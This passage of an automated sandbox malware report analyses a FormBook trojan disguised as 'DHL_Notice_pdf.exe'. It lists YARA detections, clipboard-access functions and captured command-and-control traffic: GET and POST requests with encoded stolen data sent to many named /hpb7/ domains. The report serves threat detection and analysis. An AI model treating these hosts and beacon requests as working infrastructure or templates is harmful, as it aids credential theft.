1b 1b 7d 71 74 99 f9 59 c0 ae 7e a2 33 46 c2 28 23 d3 68 19 7a e4 f9 f1 d0 b1 ed 0b f2 b3 3f 0d 18 f9 39 8a a6 2c 49 2f 3b bc ee d1 51 ab 75 f9 cc 30 c8 57 41 40 fc 90 bc 0e 19 79 f3 ed 6b d2 33 1d f3 9c 18 84 fa 51 ca 22 d3 8d 16 c4 30 ae a0 32 76 9c 77 30 89 26 51 96 2a dd 0b 23 3f f4 d8 ad 46 3a d5 aa 33 16 b2 84 66 51 a2 d4 ae a0 3c fd ea fb d7 6f be 7d dd 16 b8 25 90 d4 4d fc 38 23 d9 5d cc c6 1a 8d e3 c0 77 69 e6 47 61 27 f0 5e 7e 48 a3 50 23 6e 40 d3 74 ac 71 52 8d d4 9d b3 05 d5 80 80 d6 bd f6 1f c8 fa db 4c 1b 09 d6 bd eb bc eb f0 2a c0 3e 4d d7 fe 63 96 d0 78 ae 8d de de 6b ff 01 48 b4 91 f6 75 c2 a8 e7 26 cb c5 e4 07 3f cd a0 8e ef 95 00 24 c0 ca 84 73 12 78 f3 ae 33 8f 27 67 ef 3a c7 93 bc 65 c0 5b fa 19 5b 00 90 6f 03 b6 60 61 56 42 03 e5 df 67 6c d1 08 c1 31 00 14 b5 e3 28 f5 81 05 da c8 d6 35 c0 a0 8d 0a e2 ff c1 26 20 00 8d 80 6a ba 06 23 a9 8d b4 bf 45 0b 68 e2 31 ce 6e 04 ae fd 10 45 1f fd 70 46 a6 51 42 28 09 d9 8a 40 9f 75 fc 97 24 2c a6 7e a2 13 fc 06 e5 24 61 8b c8 63 c1 97 e4 1f ec e4 86 91 59 94 91 bb 68 49 dc e8 86 25 cc 33 c9 ab 68 b1 60 89 eb d3 00 1a 25 2c f5 3d 16 82 e8 93 94 25 30 23 4c f2 4b 14 93 ff 5e d2 c0 cf ee 10 0b 60 a7 19 a1 21 a1 d3 69 94 78 74 12 30 12 27 be cb 9e 69 ba b6 4c 82 1d c3 a2 3d e8 5a c8 6e 39 e3 54 11 d8 38 82 39 9b 1f f4 82 a7 7b 8d 94 10 85 1c 90 ae 15 e3 e5 3c 6e bc 38 e8 62 d4 fe 1e 65 e4 3b 98 e4 8d 98 21 5a 3f e8 5a 9c b0 1b 3f 5a a6 28 4f db d9 52 c8 dd c3 7b 95 25 af 93 19 0d fd df 70 2a 36 92 b5 e3 a8 dc 42 08 5e 49 2b 35 ea 86 a6 6b 41 34 8b 54 99 ff 7e 41 67 ec f5 e4 03 73 61 b6 ee 16 8b 55 6c 08 95 fc ae b3 8c 83 88 7a e9 bb 8e 63 39 dd 77 1d cb 7e d7 01 f0 46 18 19 13 ea 7e 9c 25 c0 5f 33 0e 51 57 ec d4 03 a5 5e fe 00 64 ea 5c e9 6b 23 db Data Ascii: 5253
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 21 Mar 2023 07:08:49 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 196Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 21 Mar 2023 07:08:52 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 196Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 21 Mar 2023 07:08:55 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 196Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: explorer.exe, 00000004.00000002.517404436.000000001584A000.00000004.80000000.00040000.00000000.sdmp, cmmon32.exe, 00000005.00000002.506713363.0000000004EEA000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://kunimi.org/hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=LsyOeIgM/ET1t5hHa8GhcP6qBeQiLfhDrF81hKHttqb/Il/ds
Source: DHL_Notice_pdf.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: explorer.exe, 00000004.00000002.517404436.0000000016024000.00000004.80000000.00040000.00000000.sdmp, cmmon32.exe, 00000005.00000002.506713363.00000000056C4000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://rifleroofers.com/hpb7/?bcX3Uv=Sr1AjUgE1bmYtN0hdeH1
Source: explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.0dhy.xyz
Source: explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.0dhy.xyz/hpb7/
Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.admet01.club
Source: explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.admet01.club/hpb7/
Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.admet01.clubReferer:
Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.adoptiveimmunotech.com
Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.adoptiveimmunotech.com/hpb7/
Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.adoptiveimmunotech.com/hpb7/j
Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.adoptiveimmunotech.comReferer:
Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.amirah.cfd
Source: explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.amirah.cfd/hpb7/
Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.amirah.cfdReferer:
Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.bisarropainting.com
Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.bisarropainting.com/hpb7/
Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.bisarropainting.com/hpb7/:
Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.bisarropainting.comReferer:
Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.bohndigitaltech.com
Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.bohndigitaltech.com/hpb7/
Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.bohndigitaltech.com/hpb7/Xz.
Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.buymyenergy.com
Source: explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.buymyenergy.com/hpb7/
Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.buymyenergy.comReferer:
Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.creative-shield.com
Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.creative-shield.com/hpb7/
Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.creative-shield.com/hpb7/:
Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.creative-shield.comReferer:
Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.513596661.000000000B74D000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.denko-kosan.com
Source: explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.denko-kosan.com/hpb7/
Source: explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.denko-kosan.comReferer:
Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.kotelak.ru
Source: explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.kotelak.ru/hpb7/
Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.kotelak.ruReferer:
Source: explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.kunimi.org
Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.kunimi.org/hpb7/
Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.kunimi.org/hpb7/I
Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.madliainsalu.com
Source: explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.madliainsalu.com/hpb7/
Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.madliainsalu.comReferer:
Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.mindsetlighting.xyz
Source: explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.mindsetlighting.xyz/hpb7/
Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.mindsetlighting.xyzReferer:
Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.rifleroofers.com
Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.rifleroofers.com/hpb7/
Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.traindic.top
Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.traindic.top/hpb7/
Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.yongleproducts.com
Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.yongleproducts.com/hpb7/
Source: 146E771M.5.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 146E771M.5.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 146E771M.5.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: cmmon32.exe, 00000005.00000003.315194802.0000000000449000.00000004.00000020.00020000.00000000.sdmp, 146E771M.5.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 146E771M.5.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: cmmon32.exe, 00000005.00000003.315194802.0000000000449000.00000004.00000020.00020000.00000000.sdmp, 146E771M.5.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: cmmon32.exe, 00000005.00000003.315194802.0000000000449000.00000004.00000020.00020000.00000000.sdmp, 146E771M.5.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: cmmon32.exe, 00000005.00000003.315194802.0000000000449000.00000004.00000020.00020000.00000000.sdmp, 146E771M.5.dr String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: cmmon32.exe, 00000005.00000003.315194802.0000000000449000.00000004.00000020.00020000.00000000.sdmp, 146E771M.5.dr String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
Source: cmmon32.exe, 00000005.00000003.315194802.0000000000449000.00000004.00000020.00020000.00000000.sdmp, 146E771M.5.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown HTTP traffic detected: POST /hpb7/ HTTP/1.1Host: www.0dhy.xyzConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.0dhy.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.0dhy.xyz/hpb7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 62 63 58 33 55 76 3d 4d 70 4e 34 42 63 49 58 75 59 58 5a 77 34 31 77 37 77 71 4f 75 56 79 4f 63 53 76 5a 30 49 66 59 78 2d 70 50 78 5a 68 48 62 47 61 6f 7e 51 42 63 44 6c 76 79 4b 51 63 49 78 50 6f 46 46 30 39 36 71 5a 47 53 77 6f 59 68 37 39 51 63 61 42 76 41 61 53 75 78 5a 6f 4d 4e 65 53 4b 5a 68 6f 6f 34 35 59 5a 43 4a 39 28 54 6b 54 4c 35 36 74 50 34 7a 43 37 56 71 6b 56 4b 6b 65 67 46 30 53 75 6e 62 71 4f 49 75 5f 46 45 4d 6f 6c 6f 51 57 47 74 4d 36 4f 37 78 36 32 50 53 4a 54 78 37 45 7a 6b 54 31 72 78 72 36 63 72 6e 73 31 52 5a 30 76 59 61 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: bcX3Uv=MpN4BcIXuYXZw41w7wqOuVyOcSvZ0IfYx-pPxZhHbGao~QBcDlvyKQcIxPoFF096qZGSwoYh79QcaBvAaSuxZoMNeSKZhoo45YZCJ9(TkTL56tP4zC7VqkVKkegF0SunbqOIu_FEMoloQWGtM6O7x62PSJTx7EzkT1rxr6crns1RZ0vYaw).
Source: unknown DNS traffic detected: queries for: www.yongleproducts.com
Source: C:\Windows\explorer.exe Code function: 4_2_0B73A4E2 getaddrinfo,SleepEx,setsockopt,recv,recv, 4_2_0B73A4E2
Source: global traffic HTTP traffic detected: GET /hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=qNzMMFnF92wYqby+PK0Ez7hJYWSZzqH1hiqfKssSJUPL9XRjbsSUYneeVaUFujlDIgVdAeBkPDqj9kdbdEfqEoULBaI9U5csBw== HTTP/1.1Host: www.yongleproducts.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /hpb7/?bcX3Uv=BrlYCq9+qqzfybZpwXKugHGOc0m4ktDYrdhK4pNzcFj3giICUF3BZQEP3ssdPmgNj5Kg/PdRxbVpWQCkOBnIEYQcZEeIna030A==&xN_j=yFbSaCxwQG4Y-X HTTP/1.1Host: www.0dhy.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=LsyOeIgM/ET1t5hHa8GhcP6qBeQiLfhDrF81hKHttqb/Il/dsCibnuekbaxwoyPtCZtmftv1iNZwvaen+NIMKLdu8Y9hsRKcKA== HTTP/1.1Host: www.kunimi.orgConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /hpb7/?bcX3Uv=bTtFiHq0GQrF6aFlJXqsXsYFYYSgPtrX4CJLxcpJGK/F7H1QBurO56xriJCe1rAnTJlhkBPAE1A8g1vh/R7KfM22DyUBSGy/9w==&xN_j=yFbSaCxwQG4Y-X HTTP/1.1Host: www.traindic.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=+QEmeUzOQAV/evbBmcNZRFxNHMmEBYUw3TD399HaSALRcdrdntvE2stvjFfWDoHleQ7kMHGKc1CQfriDp0hgoRSMDh0fNxliSQ== HTTP/1.1Host: www.bohndigitaltech.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /hpb7/?bcX3Uv=Sr1AjUgE1bmYtN0hdeH1+2eYW2bz9zJIy7x8VWFTjEXaDkIuvqWhFoT+O4ddqC6+eWArdJNQDIDq/++CVSPV2yhYsiVz8XiXvw==&xN_j=yFbSaCxwQG4Y-X HTTP/1.1Host: www.rifleroofers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=NuHAd+vfjtmC4E+cdz1CpM6J6ScGh9KWfGXGi6oH+281UYUkr6SouFSZ7LMQAOLiSk3FYsgr8Pu9aCQzqq/bHuqb5CQESJqHRQ== HTTP/1.1Host: www.denko-kosan.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\DHL_Notice_pdf.exe Code function: 0_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_00405809

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 3.2.zkvixbqxp.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.zkvixbqxp.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.274142159.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.273942150.0000000000560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.505204819.00000000026C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.504397231.0000000000240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 3.2.zkvixbqxp.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 3.2.zkvixbqxp.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.zkvixbqxp.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 3.2.zkvixbqxp.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.274142159.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.274142159.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.273942150.0000000000560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.273942150.0000000000560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.505204819.00000000026C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.505204819.00000000026C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.504397231.0000000000240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.504397231.0000000000240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: DHL_Notice_pdf.exe
Source: initial sample Static PE information: Filename: DHL_Notice_pdf.exe
Uses 32bit PE files
Source: DHL_Notice_pdf.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Yara signature match
